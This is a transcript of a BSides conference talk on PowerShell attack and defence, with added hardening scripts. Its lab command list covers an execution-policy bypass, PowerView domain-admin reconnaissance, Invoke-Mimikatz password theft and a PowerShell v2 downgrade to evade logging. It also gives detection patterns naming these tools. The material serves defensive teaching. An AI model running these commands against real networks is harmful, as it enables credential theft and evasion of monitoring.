BSides Tampa
Pow Pow Powershell, Octavio Paguaga
Posted 12-Apr-2017

TRANSCRIPT

Pow Pow Powershell
Octavio Paguaga

About Me
•Octavio / @oaktree__
•Washington DC
•Penetration tester working for Oaktree Security
•“Woodworker”

What I hope you take away

•Get excited about PowerShell and go out and learn more.

•Utilize PowerShell no matter what your role is.

•Upgrade and monitor PowerShell usage in your environment.

If you are absolutely new to PowerShell

•Videos
◦ https://www.youtube.com/watch?v=4X_uBL2YpmA
◦ https://www.youtube.com/watch?v=3vJvkANKVWA

•Books
◦ PowerShell in a Month of Lunches
◦ Windows PowerShell Programming for the Absolute Beginner

Overview
•Demo how PS can be used to attack
◦ PowerView and Invoke-Mimikatz

•Methods to detect PS activity

•Methods to limit PS activity
◦ Constrained Language Mode
◦ AppLocker
◦ NetCease

•Valuable references

What is PowerShell
•Object-oriented programming language for Windows

•Uses cmdlets structured as Verb-Noun
◦ Get-Help
◦ Get-Command
◦ Invoke-Command

PowerView & Invoke-Mimikatz
•PowerView is for reconnaissance
◦ Written by Will Schroeder (Harmj0y)
◦ Power to domain users

•Mimikatz steals passwords

https://github.com/HarmJ0y/CheatSheets/blob/master/PowerView.pdf

Attack Demonstration (INSERT NETWORK DIAGRAM FOR THE LAB)

List of commands used on oaktreelab (1)

Start PowerShell with the execution policy set to bypass
◦ powershell.exe -exec bypass

Import the PowerView module
◦ Import-Module powerview.ps1

Identify all groups with the word "admin" in the name
◦ Get-NetGroup -GroupName "*admin*"

Get members of the Domain Admins group
◦ Get-NetGroupMember -GroupName "domain admins"

List of commands used on oaktreelab (1, cont.)

Determine where user oaktree_dadm is located
◦ Invoke-UserHunter -UserName "oaktree_dadm"

Connect to oaktreelab03
◦ New-PSSession -ComputerName "oaktreelab03"
◦ Enter-PSSession -Id 1

Import Invoke-Mimikatz
◦ Import-Module invoke-mimikatz.ps1

Run Mimikatz
◦ Invoke-Mimikatz

Addition from the presentation: the regular user used has administrator privileges on the oaktreelab3 system. My original intention was to show how one could use PowerView to enumerate local groups as well.

Demo time

PowerShell Logging
•What log records were created on oaktree3?

PowerShell   Desktop OS    Server OS
Version 2    Windows 7     Windows 2008 R2
Version 3    Windows 8     Windows 2012
Version 4    Windows 8.1   Windows 2012 R2
Version 5    Windows 10    Windows 2016

Logging with PS 2

https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/

Deep module logging

Command run: Add-Member -MemberType NoteProperty -Name memcpy -Value MyDelegateType -InputObject system.object

ScriptBlock logging

Transcription
•Saves all output to Windows event logs.

•Can do this with PS2 as well! Use the cmdlets Start-Transcript and Stop-Transcript.
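Added example, not from the talk: enabling the three channels above (module logging, script block logging, transcription) on PowerShell 5 by writing the same registry values the Group Policy settings write. It assumes an elevated session; the transcript folder C:\PSTranscripts is an assumed choice.

```powershell
# Added example, not from the talk. Writes the policy registry values that the
# "Turn on Module Logging", "Turn on PowerShell Script Block Logging" and
# "Turn on PowerShell Transcription" Group Policy settings would write.
# Assumes an elevated PowerShell 5.x session; C:\PSTranscripts is an assumed path.
$base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Module logging (event ID 4103 in Microsoft-Windows-PowerShell/Operational):
# records pipeline execution details; "*" means every module, not just a chosen few.
New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
New-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -PropertyType DWord -Force | Out-Null
New-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# Script block logging (event ID 4104): logs the code as the engine actually runs it,
# which is after any string building or encoding used to hide it.
New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
New-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force | Out-Null

# Transcription: writes each session's input and output to a text file in OutputDirectory
# (pick a directory users can append to but not read or modify).
New-Item -Path "$base\Transcription" -Force | Out-Null
New-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting -Value 1 -PropertyType DWord -Force | Out-Null
New-ItemProperty -Path "$base\Transcription" -Name EnableInvocationHeader -Value 1 -PropertyType DWord -Force | Out-Null
New-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value 'C:\PSTranscripts' -PropertyType String -Force | Out-Null

# Read the settings back to confirm them; new sessions pick them up at start-up.
Get-ItemProperty "$base\ModuleLogging", "$base\ScriptBlockLogging", "$base\Transcription" |
    Format-List Enable*, OutputDirectory
```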

Countermeasures, or how I could have made it harder for the attacker.

“Nobody made a greater mistake than he who did nothing because he could do only a little.” –Edmund Burke.

Demo: find the square root of 64: [math]::sqrt(64)

Constrained Language Mode
•Constrained language removes support for .NET & Windows API calls and COM access.

•How to enable
◦ [environment]::SetEnvironmentVariable('__PSLockdownPolicy','4','Machine')

•Confirm it is configured
◦ $ExecutionContext.SessionState.LanguageMode

•How to disable
◦ Remove-Item env:\__PSLockdownPolicy
◦ Through System Properties > Environment Variables.
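Added example, not the talk's own demo script: sets the lockdown variable shown above and starts a second powershell.exe to show its effect on the slide's [math]::sqrt(64) demo. It assumes an elevated Windows PowerShell 5 session (the Machine scope needs it).

```powershell
# Added example, not from the talk. Assumes an elevated Windows PowerShell 5 session.
# __PSLockdownPolicy is read when an engine starts, so the session that sets it is not
# affected; a child process is started to observe the change.
[Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')   # persistent, as on the slide
$env:__PSLockdownPolicy = '4'   # also in this process, so the child inherits it right now

# What the child will run: report its language mode, then try the slide's demo.
$probe = {
    "LanguageMode: $($ExecutionContext.SessionState.LanguageMode)"
    try {
        # [math] is not one of the core types allowed in ConstrainedLanguage, so the
        # static method call is refused there; in FullLanguage it simply returns 8.
        "sqrt(64) = $([math]::Sqrt(64))"
    } catch {
        "Blocked: $($_.Exception.Message)"
    }
}

# -EncodedCommand avoids quoting problems when passing a multi-line script to a new process.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($probe.ToString()))
& powershell.exe -NoProfile -EncodedCommand $encoded

# Caveat the slide's "How to disable" bullet implies: a process started with the variable
# removed gets FullLanguage back, so this is a speed bump rather than a security boundary.
```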

What is AppLocker
•Allows policies to be created based on:
◦ Executables
◦ Windows Installer rules
◦ Script rules
◦ Packaged app rules

Not all Windows 7 versions are created equal

https://technet.microsoft.com/en-us/library/dd759131(v=ws.11).aspx

Sample AppLocker rules (these rules are courtesy of Microsoft)

◦ Get-AppLockerFileInformation -Directory "C:\trusted" | New-AppLockerPolicy -RuleType Path -User Everyone -Xml
◦ Open secpol.msc > Application Control Policies > AppLocker > Script Rules, right-click and select “Automatically Generate Rules”
◦ Allow all scripts for administrators
◦ Allow all scripts to be run from the Program Files folder
◦ Allow all scripts to be run from the Windows folder

Create a file in C:\trusted named math.ps1
◦ Contents of file: [math]::sqrt(64)
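Added example, not the talk's own script: builds the C:\trusted rule as a policy object with the AppLocker cmdlets, checks it with Test-AppLockerPolicy before applying it, then merges it into the local policy. It assumes an elevated session on an edition that ships AppLocker, the C:\trusted\math.ps1 file from the slide, and a constructed copy at C:\other\math.ps1 for comparison.

```powershell
# Added example, not from the talk. Assumes an elevated session on a Windows edition
# with AppLocker. C:\trusted\math.ps1 is the slide's file; C:\other\math.ps1 is a
# constructed second copy that sits outside the allowed folder.
Import-Module AppLocker
foreach ($dir in 'C:\trusted', 'C:\other') {
    New-Item -ItemType Directory -Path $dir -Force | Out-Null
    Set-Content -Path "$dir\math.ps1" -Value '[math]::sqrt(64)'
}

# Path rules are generated from file information objects, not from a bare path string.
# This yields one path rule per script found; a single folder rule for C:\trusted is
# what the secpol.msc steps on the slide produce.
$policy = Get-AppLockerFileInformation -Directory 'C:\trusted' -FileType Script |
    New-AppLockerPolicy -RuleType Path -User Everyone -RuleNamePrefix Trusted

# Dry run: ask AppLocker what it would decide for each file under this policy.
# Deny rules are evaluated first; once the Script collection holds any allow rule,
# a script that matches no allow rule is denied.
Test-AppLockerPolicy -PolicyObject $policy -User Everyone -Path 'C:\trusted\math.ps1', 'C:\other\math.ps1' |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize

# Apply by merging with the existing local policy so current rules are kept.
# Enforcement still needs the Script collection set to Enforce and the Application
# Identity service (AppIDSvc) running, which the slide's secpol.msc steps cover.
Set-AppLockerPolicy -PolicyObject $policy -Merge

# Re-check against the effective policy (local policy merged with domain policy).
Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path 'C:\other\math.ps1' -User Everyone
```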

AppLocker demo

AppLocker implementation considerations

•Ensure whitelisted folders have appropriate permissions set

•If the attacker has admin, AppLocker is defeated.

•AppLocker evaluates deny rules first.
◦ Use the cmdlet Test-AppLockerPolicy to confirm rules

Block powershell.exe
•powershell.exe is not the engine itself, rather a wrapper for the DLL. I don’t need to use powershell.exe.

•Search for ben0xa's talk: PowerShell Secrets and Tactics

Anti-Malware Scan Interface
•AMSI allows us to:
◦ evaluate code just prior to execution by the script host
◦ evaluate code after all the obfuscation has been stripped away

https://blogs.technet.microsoft.com/poshchap/2015/10/16/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi/
https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf

How do we make recon harder?

NetCease
•Written by Itai Grady; the goal of this script is to increase the security of the NetSessionEnum API.

https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dcb5b
http://www.harmj0y.net/blog/category/penetesting/
https://adsecurity.org/?p=3299

How to bypass everything we just discussed

Utilize PS 2 if installed
◦ powershell.exe -version 2
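Added example, not from the talk: a defender's answer both to this downgrade and to the earlier question of what log records the demo left on the host. It assumes an elevated session, Windows 8 / Server 2012 or later for the optional-feature cmdlets at the end, and matches only the command names from the lab list above.

```powershell
# Added example, not from the talk. Assumes an elevated session; the DISM cmdlets at
# the end need Windows 8 / Server 2012 or later (on Windows 7 the v2 engine is built in).
$since = (Get-Date).AddDays(-7)

# 1. With module and script block logging on, the lab's commands are visible in
#    events 4103/4104. The names matched here are the ones on the command list above.
$opLog = 'Microsoft-Windows-PowerShell/Operational'
Get-WinEvent -FilterHashtable @{ LogName = $opLog; Id = 4103, 4104; StartTime = $since } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Invoke-Mimikatz|Invoke-UserHunter|Get-NetGroupMember|MyDelegateType' } |
    Select-Object TimeCreated, Id, @{ n = 'Snippet'; e = { $_.Message.Substring(0, [Math]::Min(100, $_.Message.Length)) } } |
    Format-Table -AutoSize

# 2. A v2 engine writes none of those events, but every engine start still logs event
#    400 to the classic "Windows PowerShell" log, and its message names the EngineVersion.
Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = $since } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'EngineVersion=2\.' } |
    Select-Object TimeCreated, MachineName,
        @{ n = 'EngineVersion'; e = { [regex]::Match($_.Message, 'EngineVersion=([\d.]+)').Groups[1].Value } },
        @{ n = 'Host';          e = { [regex]::Match($_.Message, 'HostName=(\S+)').Groups[1].Value } } |
    Format-Table -AutoSize

# 3. Remove the v2 engine so "powershell.exe -version 2" no longer gives a logging-free shell.
Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root | Select-Object FeatureName, State
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart
```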

Credits: reference material from
•Microsoft
•Sean Metcalf
•Ben0xa
•Will Schroeder & Matt Graeber

On the Shoulders of Giants
•@Ben0xA
•Carlos Perez @darkoperator
•Jared Haight @jaredhaight
•Sean Metcalf @pyrotek3
•Jared Atkinson @jaredcatkinson
•Matt Graeber @mattifestation
•Will Schroeder @harmj0y
•Lee Holmes @lee_holmes
•Jessica Payne @jepayneMSFT
•@enigma0x3
•Casey Smith @subtee
•Chris Campbell @obscuresec

THANKS TO EVERYONE THAT INSPIRED US TO GET STARTED

Questions/Comments
Slides available on my GitHub page

Octavio Paguaga
@oaktree__ <----- two underscores
